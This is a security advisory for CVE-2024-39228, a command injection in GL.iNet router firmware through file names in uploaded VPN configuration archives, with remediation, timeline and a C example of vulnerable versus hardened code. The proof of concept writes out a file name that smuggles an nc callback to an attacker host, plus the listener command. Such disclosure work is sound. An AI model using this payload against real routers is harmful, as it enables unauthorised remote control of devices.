CVE-2024-39228

OS Command Injection in Various GL.iNet Devices

CVE ID
CVE-2024-39228  
CVE Link
https://nvd.nist.gov/vuln/detail/CVE-2024-39228
Vendor
GL.iNet
Affected Product & Version

MT6000: 4.5.8
A1300/X300B: 4.5.16
AX1800/AXT1800/MT2500/MT3000: 4.5.16
X3000/XE3000: 4.4.8
XE300: 4.3.16
E750: 4.3.12
X750/SFT1200/AR300M/AR300M16/AR750/AR750S/B1300/MT1300/MT300N-V2/AP1300: 3.217
B2200/MV1000/MV1000W/USB150/SF1200/N300/S1300: 3.216

Vulnerability Type
CWE-78: Improper Neutralization of Special Elements used in an OS command (‘OS Command Injection’)
CVSS Base Score / CVSS Vector

NVD: 9.8 Critical / CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

BDO: 8.8 High / CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

The two vectors differ only in Privileges Required: NVD scores the flaw as reachable without authentication (PR:N), whereas the finding as described below requires a logged-in user of the web interface (PR:L).

Author
Manfred Heinz
Date
2024-08-06

CVE Details

Description:

Due to improper neutralization of special elements used in an OS command inside the OpenVPN and WireGuard APIs of the GL.iNet firmware, an authenticated attacker can inject and execute arbitrary shell commands by uploading a client configuration archive that contains files with specially crafted file names.

The web application component ovpn-client.so is vulnerable to authenticated remote code execution in the check_ovpn_client_config and check_config functions. Shell commands can be injected through the file name of an OpenVPN client configuration file contained in an archive that is uploaded to the web application. check_ovpn_client_config() does not validate the names of the archived configuration files: file names with the extension .ovpn, .txt, .crt or .conf are embedded in a system call, so shell commands embedded in the file name are executed by the router. Archives with the extensions .tar, .gz or .zip can be used for an exploit.

By invoking the ovpn interface, arbitrary shell commands can be executed to manipulate the router or to gain access to the router's operating system. As a proof of concept, the following steps can be performed (192.168.8.178 is the attacker's machine on the router's LAN in this example):

1. Create a configuration file with a shell command in the file name (the single quotes keep the local shell from expanding it): touch '$(nc 192.168.8.178 4444).txt'

2. Pack the file into an archive, for example a tar archive: tar -cvf rce.tar '$(nc 192.168.8.178 4444).txt'

3. Start an nc listener on the attacker's machine: nc -lvp 4444

4. Upload the tar archive through the OpenVPN client configuration upload function of the web application.

5. A connection from the router arrives at the listener, showing that the command embedded in the file name was executed on the device.
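The injection point described above, as an added example that is not GL.iNet's code: a hypothetical C configuration checker that pastes an archived file name into a command string (the vulnerable pattern, equivalent to what a system() or popen() caller does) beside the two changes that close it, a strict allowlist on the file name and a shell-free execv() invocation. The "ovpn-check" program and its path are assumptions for illustration; the file name is the one from the proof of concept.

```c
/* Added example, not GL.iNet's code: the CWE-78 pattern described above,
 * reconstructed as a hypothetical configuration checker, beside a hardened
 * version. "ovpn-check" and its path are placeholders, not a real binary.
 *
 * Vulnerable side: the name of a file taken from the uploaded archive is
 * pasted into a command string that a system()/popen() caller would run.
 * A member named "$(nc 192.168.8.178 4444).txt" therefore runs nc as soon
 * as the shell parses the string; double quotes do not stop $(...).
 *
 * Hardened side: the name is checked against a strict allowlist and the
 * checker is started with execv(), so no shell ever parses the name. */
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

#define CMD_MAX 512

/* Vulnerable: build the command line the way a system() caller would.
 * Returns the length written, or -1 on truncation. */
int build_check_cmd_vulnerable(const char *dir, const char *name,
                               char *out, size_t outsz)
{
    int n = snprintf(out, outsz, "ovpn-check --config \"%s/%s\"", dir, name);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

/* True if a string still carries shell substitution or control characters.
 * Used here only to show that the vulnerable builder passes them through. */
int contains_shell_meta(const char *s)
{
    return strpbrk(s, "$`;|&<>()\n") != NULL;
}

/* Hardened, step 1: allowlist the member name before it is used anywhere.
 * Only [A-Za-z0-9._-], no leading '.' or '-', no '/', at most 64 bytes,
 * and one of the extensions the advisory names. */
int is_safe_config_name(const char *name)
{
    static const char *exts[] = { ".ovpn", ".conf", ".crt", ".txt" };
    size_t len = strlen(name);
    if (len == 0 || len > 64) return 0;
    if (name[0] == '.' || name[0] == '-') return 0;   /* no dotfiles, no "-flag" */
    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)name[i];
        if (!(isalnum(c) || c == '.' || c == '_' || c == '-')) return 0;
    }
    for (size_t i = 0; i < sizeof exts / sizeof exts[0]; i++) {
        size_t el = strlen(exts[i]);
        if (len > el && strcmp(name + len - el, exts[i]) == 0) return 1;
    }
    return 0;
}

/* Hardened, step 2: run the checker without a shell. The path is a single
 * argv element, so whatever it contains is never interpreted. Returns the
 * checker's exit status, or -1 if the name fails validation or the process
 * could not be started (a missing binary yields 127 from the child). */
int run_check_safe(const char *dir, const char *name)
{
    if (!is_safe_config_name(name)) return -1;
    char path[CMD_MAX];
    if (snprintf(path, sizeof path, "%s/%s", dir, name) >= (int)sizeof path)
        return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *argv[] = { "ovpn-check", "--config", path, NULL };
        execv("/usr/bin/ovpn-check", argv);   /* placeholder path */
        _exit(127);
    }
    int status = 0;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    const char *evil = "$(nc 192.168.8.178 4444).txt";   /* the PoC file name */
    char cmd[CMD_MAX];
    build_check_cmd_vulnerable("/tmp/ovpn", evil, cmd, sizeof cmd);
    printf("vulnerable would run  : %s\n", cmd);
    printf("metacharacters kept   : %s\n", contains_shell_meta(cmd) ? "yes" : "no");
    printf("allowlist accepts evil: %d, accepts client.ovpn: %d\n",
           is_safe_config_name(evil), is_safe_config_name("client.ovpn"));
    printf("run_check_safe(evil)  : %d (rejected before any exec)\n",
           run_check_safe("/tmp/ovpn", evil));
    return 0;
}
```

The allowlist is deliberately narrower than "reject known metacharacters": a denylist would have to keep pace with every shell, whereas accepting only [A-Za-z0-9._-] with a known extension leaves nothing for a shell to interpret even if a later code path does hand the name to one. Running the checker through execv() with an argv array is the second, independent layer; either change alone would have stopped the file name in the proof of concept.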


Remediation:

Update the firmware to the latest available version, at least (depending on model) to:
3.2.18, 4.3.17, 4.4.9, 4.5.17 or 4.6.2



References:


Timeline:

2024-05-05: Vulnerability reported to GL.iNet

2024-05-30: Vulnerability fixed by the vendor

2024-08-01: GL.iNet published the vendor security advisory

2024-08-06: CVE published